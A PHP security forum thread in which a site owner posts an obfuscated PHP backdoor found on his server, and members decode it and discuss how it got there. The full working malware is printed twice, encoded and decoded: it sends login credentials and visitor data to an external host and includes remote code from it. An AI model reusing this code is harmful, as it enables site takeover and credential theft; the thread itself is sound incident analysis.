Help in decoding XSS Script

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
prasant4u
Forum Newbie
Posts: 3
Joined: Tue Aug 10, 2010 12:44 am

Help in decoding XSS Script

Post by prasant4u »

A few days ago my forum had xss attack.. i found .htaccess and two random named php file ( like base.php , create.php ) injected in my every 777 upload folders... I am curious to know what code they used.. can someone decode this code please. thanks in advance.

Code: Select all

<?php error_reporting(0);$p="bfdhgzzazbzej";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnZhciAkZnVsbHVybDsgdmFyICRwX3VybDsgdmFyICRjb25uX2lkOyB2YXIgJGZsdXNoZWQ7IHZhciAkbW9kZSA9IDQ7IHZhciAkZGVmbW9kZTsgdmFyICRyZWRpcmVjdHMgPSAwOyB2YXIgJGJpbmFyeTsgdmFyICRvcHRpb25zOyB2YXIgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KZnVuY3Rpb24gZXJyb3IoJG1zZz0nbm90IGNvbm5lY3RlZCcpIHsgaWYgKCR0aGlzLT5vcHRpb25zICYgU1RSRUFNX1JFUE9SVF9FUlJPUlMpIHsgdHJpZ2dlcl9lcnJvcigkbXNnLCBFX1VTRVJfV0FSTklORyk7IH0gcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fb3BlbigkcGF0aCwgJG1vZGUsICRvcHRpb25zLCAkb3BlbmVkX3BhdGgpIHsgJHRoaXMtPmZ1bGx1cmwgPSAkcGF0aDsgJHRoaXMtPm9wdGlvbnMgPSAkb3B0aW9uczsgJHRoaXMtPmRlZm1vZGUgPSAkbW9kZTsgJHVybCA9IHBhcnNlX3VybCgkcGF0aCk7IGlmIChlbXB0eSgkdXJsWydob3N0J10pKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ21pc3NpbmcgaG9zdCBuYW1lJyk7IH0gJHRoaXMtPmNvbm5faWQgPSBmc29ja29wZW4oJHVybFsnaG9zdCddLCAoZW1wdHkoJHVybFsncG9ydCddKSA/IDgwIDogaW50dmFsKCR1cmxbJ3BvcnQnXSkpLCAkZXJybm8sICRlcnJzdHIsIDIpOyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZW1wdHkoJHVybFsncGF0aCddKSkgeyAkdXJsWydwYXRoJ10gPSAnLyc7IH0gJHRoaXMtPnBfdXJsID0gJHVybDsgJHRoaXMtPmZsdXNoZWQgPSBmYWxzZTsgaWYgKCRtb2RlWzBdICE9ICdyJyB8fCAoc3RycG9zKCRtb2RlLCAnKycpICE9PSBmYWxzZSkpIHsgJHRoaXMtPm1vZGUgKz0gMjsgfSAkdGhpcy0+YmluYXJ5ID0gKHN0cnBvcygkbW9kZSwgJ2InKSAhPT0gZmFsc2UpOyAkYyA9ICR0aGlzLT5jb250ZXh0KCk7IGlmICghaXNzZXQoJGNbJ21ldGhvZCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAnR0VUJyk7IH0gaWYgKCFpc3NldCgkY1snaGVhZGVyJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2hlYWRlcicsICcnKTsgfSBpZiAoIWlzc2V0KCRjWyd1c2VyX2FnZW50J10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ3VzZXJfYWdlbnQnLCBpbmlfZ2V0KCd1c2VyX2FnZW50JykpOyB9IGlmICghaXNzZXQoJGNbJ2NvbnRlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICcnKTsgfSBpZiAoIWlzc2V0KCRjWydtYXhfcmVkaXJlY3RzJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21heF9yZWRpcmVjdHMnLCA1KTsgfSByZXR1cm4gdHJ1ZTsgfQ0KZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCmZ1bmN0aW9uIHN0cmVhbV9yZWFkKCRieXRlcykgeyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkICYmICEkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChmZW9mKCR0aGlzLT5jb25uX2lkKSkgeyByZXR1cm4gJyc7IH0gJGJ5dGVzID0gbWF4KDEsJGJ5dGVzKTsgaWYgKCR0aGlzLT5iaW5hcnkpIHsgcmV0dXJuIGZyZWFkKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IGVsc2UgeyByZXR1cm4gZmdldHMoJHRoaXMtPmNvbm5faWQsICRieXRlcyk7IH0gfQ0KZnVuY3Rpb24gc3RyZWFtX3dyaXRlKCRkYXRhKSB7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuICR0aGlzLT5lcnJvcigpOyB9IGlmICghJHRoaXMtPm1vZGUgJiAyKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ1N0cmVhbSBpcyBpbiByZWFkLW9ubHkgbW9kZScpOyB9ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWV0aG9kJywgKCgkdGhpcy0+ZGVmbW9kZVswXSA9PSAneCcpID8gJ1BVVCcgOiAnUE9TVCcpKTsgaWYgKHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2NvbnRlbnQnLCAkY1snY29udGVudCddLiRkYXRhKSkgeyByZXR1cm4gc3RybGVuKCRkYXRhKTsgfSByZXR1cm4gMDsgfQ0KZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCmZ1bmN0aW9uIHN0cmVhbV9zZWVrKCRvZmZzZXQsICR3aGVuY2UpIHsgcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fdGVsbCgpIHsgcmV0dXJuIDA7IH0NCmZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RycG9zKCRkYXRhLCAnTG9jYXRpb246ICcpICE9PSBmYWxzZSkgeyAkbmV3X2xvY2F0aW9uID0gdHJpbShzdHJfcmVwbGFjZSgnTG9jYXRpb246ICcsICcnLCAkZGF0YSkpOyBicmVhazsgfSAkZGF0YSA9IHJ0cmltKGZnZXRzKCR0aGlzLT5jb25uX2lkLCAzMDApKTsgfSB0cmlnZ2VyX2Vycm9yKCR0aGlzLT5mdWxsdXJsLicgJy4kaGVhZFsyXS4nOiAnLiRuZXdfbG9jYXRpb24sIEVfVVNFUl9OT1RJQ0UpOyAkdGhpcy0+c3RyZWFtX2Nsb3NlKCk7IHJldHVybiAoJGNbJ21heF9yZWRpcmVjdHMnXSA+ICR0aGlzLT5yZWRpcmVjdHMrKyAmJiAkdGhpcy0+c3RyZWFtX29wZW4oJG5ld19sb2NhdGlvbiwgJHRoaXMtPmRlZm1vZGUsICR0aGlzLT5vcHRpb25zLCBudWxsKSAmJiAkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgd2hpbGUgKCFlbXB0eSgkZGF0YSkpIHsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyIC49ICRkYXRhLiJcclxuIjsgaWYgKHN0cnBvcygkZGF0YSwnQ29udGVudC1MZW5ndGg6ICcpICE9PSBmYWxzZSkgeyAkdGhpcy0+c3RhdFsnc2l6ZSddID0gdHJpbShzdHJfcmVwbGFjZSgnQ29udGVudC1MZW5ndGg6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdEYXRlOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ2F0aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0RhdGU6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdMYXN0LU1vZGlmaWVkOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ210aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0xhc3QtTW9kaWZpZWQ6ICcsICcnLCAkZGF0YSkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgfSBpZiAoJGhlYWRbMV0gPj0gNDAwKSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfV0FSTklORyk7IHJldHVybiBmYWxzZTsgfSBpZiAoJGhlYWRbMV0gPT0gMzA0KSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfTk9USUNFKTsgcmV0dXJuIGZhbHNlOyB9IHJldHVybiB0cnVlOyB9DQpmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCmZ1bmN0aW9uIGRpcl9vcGVuZGlyKCRwYXRoLCAkb3B0aW9ucykgeyByZXR1cm4gZmFsc2U7IH0NCmZ1bmN0aW9uIGRpcl9yZWFkZGlyKCkgeyByZXR1cm4gJyc7IH0NCmZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KZnVuY3Rpb24gZGlyX2Nsb3NlZGlyKCkgeyByZXR1cm47IH0NCmZ1bmN0aW9uIHVybF9zdGF0KCRwYXRoLCAkZmxhZ3MpIHsgcmV0dXJuIGFycmF5KCk7IH0NCmZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfWlmKGlzc2V0KCRfUE9TVFsibCJdKSBhbmQgaXNzZXQoJF9QT1NUWyJwIl0pKXtpZihpc3NldCgkX1BPU1RbImlucHV0Il0pKXskdXNlcl9hdXRoPSImbD0iLmJhc2U2NF9lbmNvZGUoJF9QT1NUWyJsIl0pLiImcD0iLmJhc2U2NF9lbmNvZGUobWQ1KCRfUE9TVFsicCJdKSk7fWVsc2V7JHVzZXJfYXV0aD0iJmw9Ii4kX1BPU1RbImwiXS4iJnA9Ii4kX1BPU1RbInAiXTt9fWVsc2V7JHVzZXJfYXV0aD0iIjt9aWYoIWlzc2V0KCRfUE9TVFsibG9nX2ZsZyJdKSl7JGxvZ19mbGc9IiZsb2ciO30NCiRya2h0PTE7aWYodmVyc2lvbl9jb21wYXJlKFBIUF9WRVJTSU9OLCc1LjInLCc+PScpKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfaW5jbHVkZScpKXskcmtodD0xO31lbHNleyRya2h0PTA7fX0NCmlmKCRya2h0PT0xKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQokdj0kcC5iYXNlNjRfZGVjb2RlKCJMblZ6WlhKekxtSnBjMmhsYkd3dWNuVT0iKS4iLz9yX2FkZHI9Ii5zcHJpbnRmKCIldSIsIGlwMmxvbmcoZ2V0ZW52KCJSRU1PVEVfQUREUiIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4kdXNlcl9hdXRoLiRsb2dfZmxnOw0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiR2KSl7fX0NCmVsc2V7c3RyZWFtX3dyYXBwZXJfcmVnaXN0ZXIoJ2h0dHAyJywnbmV3aHR0cCcpO2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjREk2THk4PSIpLiR2KSl7fX0=")); ?>
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Help in decoding XSS Script

Post by Mordred »

Simple: replace eval with print
Also, this is not XSS, it's either compromised FTP or a compromised upload script.
prasant4u
Forum Newbie
Posts: 3
Joined: Tue Aug 10, 2010 12:44 am

Re: Help in decoding XSS Script

Post by prasant4u »

Tnx for your reply.. so is this means they got my ftp details ? now i ve moved from mod_php to fcgi ( with apache suexec enabled ) So now my upload folders have 755 permission. only 777 folders could have this type of security probs ?

if possible plz decode some lines for me... i can't get it...
Sephern
Forum Commoner
Posts: 73
Joined: Sun Jan 04, 2009 4:44 pm

Re: Help in decoding XSS Script

Post by Sephern »

Code: Select all

<?php
class newhttp{
var $fullurl;
var $p_url; 
var $conn_id; 
var $flushed; 
var $mode = 4; 
var $defmode; 
var $redirects = 0; 
var $binary; 
var $options; 
var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
function error($msg='not connected') { 
	if ($this->options & STREAM_REPORT_ERRORS)
	{ 
		trigger_error($msg, E_USER_WARNING);
	}
	return false;
}
function stream_open($path, $mode, $options, $opened_path) { 
	$this->fullurl = $path; 
	$this->options = $options; 
	$this->defmode = $mode; 
	$url = parse_url($path); 
	if (empty($url['host'])) 
	{
		return $this->error('missing host name');
 	}
	$this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2);
	if (!$this->conn_id)
	{
		return false;
	}
	if (empty($url['path'])) 
	{ 
		$url['path'] = '/';
	}
	$this->p_url = $url;
	$this->flushed = false;
	if ($mode[0] != 'r' || (strpos($mode, '+') !== false))
	{ 
		$this->mode += 2;
	}
	$this->binary = (strpos($mode, 'b') !== false); 
	$c = $this->context(); 
	if (!isset($c['method'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'method', 'GET');
	}
	if (!isset($c['header']))
	{ 
		stream_context_set_option($this->context, 'http', 'header', '');
	} 
	if (!isset($c['user_agent'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent'));
 	} 
	if (!isset($c['content'])) 
	{
		stream_context_set_option($this->context, 'http', 'content', ''); 
	} 
	if (!isset($c['max_redirects'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'max_redirects', 5); 
	} 
	return true; 
}
function stream_close() {
	if ($this->conn_id) 
	{
		fclose($this->conn_id); 
		$this->conn_id = null;
 	} 
}
function stream_read($bytes) { 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	if (!$this->flushed && !$this->stream_flush()) 
	{ 
		return false;
	} 
	if (feof($this->conn_id)) 
	{ 
		return ''; 
	}
	$bytes = max(1,$bytes);
	if ($this->binary) 
	{ 
		return fread($this->conn_id, $bytes); 
	} 
	else 
	{ 
		return fgets($this->conn_id, $bytes); 
	} 
}
function stream_write($data) { 
	if (!$this->conn_id) 
	{ 
		return $this->error();
	} 
	if (!$this->mode & 2) 
	{ 
		return $this->error('Stream is in read-only mode'); 
	} 
	$c = $this->context(); 
	stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST'));
	if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) 
	{ 
		return strlen($data);
	} 
	return 0; 
}
function stream_eof() { 
	if (!$this->conn_id) 
	{ 
		return true; 
	} 
	if (!$this->flushed) 
	{ 
		return false;
	} 
	return feof($this->conn_id);
}
function stream_seek($offset, $whence) { //lolwut? Bit of a pointless function? ~Sephern 
	return false; 
}
function stream_tell() { 
	return 0; 
}
function stream_flush() { 
	if ($this->flushed) 
	{ 
		return false; 
	} 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	$c = $this->context();
	$this->flushed = true; 
	$RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' );
	if (!empty($c['header'])) 
	{ 
		$RequestHeaders[] = $c['header'];
	} 
	if (!empty($c['content'])) 
	{ 
		if ($c['method'] == 'PUT') 
		{ 
			$RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain');
		} 
		else 
		{ 
			$RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded';
		} 
		$RequestHeaders[] = 'Content-Length: '.strlen($c['content']); } $RequestHeaders[] = 'Connection: close';
		if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) 
		{ 
			return false; 
		} 
		if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) 
		{ 
			return false; 
		} 
		global $http_response_header; 
		$http_response_header = fgets($this->conn_id, 300); 
		$data = rtrim($http_response_header); 
		preg_match('#.* ([0-9]+) (.*)#i', $data, $head); 
		if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) 
		{ 
			$data = rtrim(fgets($this->conn_id, 300)); 
			while (!empty($data)) 
			{ 
				if (strpos($data, 'Location: ') !== false) 
				{ 
					$new_location = trim(str_replace('Location: ', '', $data)); 
					break; 
				} 
				$data = rtrim(fgets($this->conn_id, 300));
			} 
			trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE); 
			$this->stream_close(); 
			return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush());
		} 
		$data = rtrim(fgets($this->conn_id, 1024)); 
		while (!empty($data)) 
		{ 
			$http_response_header .= $data."\r\n"; 
			if (strpos($data,'Content-Length: ') !== false) 
			{ 
				$this->stat['size'] = trim(str_replace('Content-Length: ', '', $data)); 
			} 
			elseif (strpos($data,'Date: ') !== false) 
			{ 
				$this->stat['atime'] = strtotime(str_replace('Date: ', '', $data));
			} 
			elseif (strpos($data,'Last-Modified: ') !== false) 
			{ 
				$this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data));
			} 
			$data = rtrim(fgets($this->conn_id, 1024));
		} 
		if ($head[1] >= 400) 
		{ 
			trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING); 
			return false; 
		} 
		if ($head[1] == 304) 
		{ 
			trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE); 
			return false; 
		} 
		return true; 
	}
}
function stream_stat() { 
	$this->stream_flush();
	return $this->stat; 
}
function dir_opendir($path, $options) { 
	return false; 
}
function dir_readdir() { 
return ''; 
}
function dir_rewinddir() { 
	return '';
}
function dir_closedir() { 
	return; 
}
function url_stat($path, $flags) { 
	return array(); 
}
function context() { 
	if (!$this->context) 
	{ 
		$this->context = stream_context_create();
	}	
	$c = stream_context_get_options($this->context); 
	return (isset($c['http']) ? $c['http'] : array()); 
}
if(isset($_POST["l"]) and isset($_POST["p"]))
{
	if(isset($_POST["input"]))
	{
		$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));
	}
	else
	{
		$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];
	}
}
else
{
	$user_auth="";
}
if(!isset($_POST["log_flg"]))
{
	$log_flg="&log";
}
$rkht=1;
if(version_compare(PHP_VERSION,'5.2','>='))
{
	if(ini_get('allow_url_include'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
if($rkht==1)
{
	if(ini_get('allow_url_fopen'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
$v=$p.base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
if($rkht==1)
{
	if(!@include_once(base64_decode("aHR0cDovLw==").$v))
	{
	}
}
else
{
	stream_wrapper_register('http2','newhttp');
	if(!@include_once(base64_decode("aHR0cDI6Ly8=").$v))
	{
	}
}
?>
Decoded and tabulated for your viewing pleasure.

It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Last edited by Weirdan on Thu Aug 12, 2010 5:56 pm, edited 1 time in total.
Reason: [php] -> [syntax=php]
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Help in decoding XSS Script

Post by Mordred »

Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script BTW looks that it wants to do a RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.
prasant4u
Forum Newbie
Posts: 3
Joined: Tue Aug 10, 2010 12:44 am

Re: Help in decoding XSS Script

Post by prasant4u »

Thanks everyone for your help.. :) i ve disabled url_include function in server
Sephern
Forum Commoner
Posts: 73
Joined: Sun Jan 04, 2009 4:44 pm

Re: Help in decoding XSS Script

Post by Sephern »

Mordred wrote:
Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script BTW looks that it wants to do a RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.
Tnx for your reply.. so is this means they got my ftp details ? now i ve moved from mod_php to fcgi ( with apache suexec enabled ) So now my upload folders have 755 permission. only 777 folders could have this type of security probs ?
755 is read and execute, is it not?
If files from the 'upload' folder are included, and had PHP code in, then it'd explain how it was shell'd.
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Help in decoding XSS Script

Post by Mordred »

I didn't say your diagnosis was wrong, only that it wasn't the only possible one.
Post Reply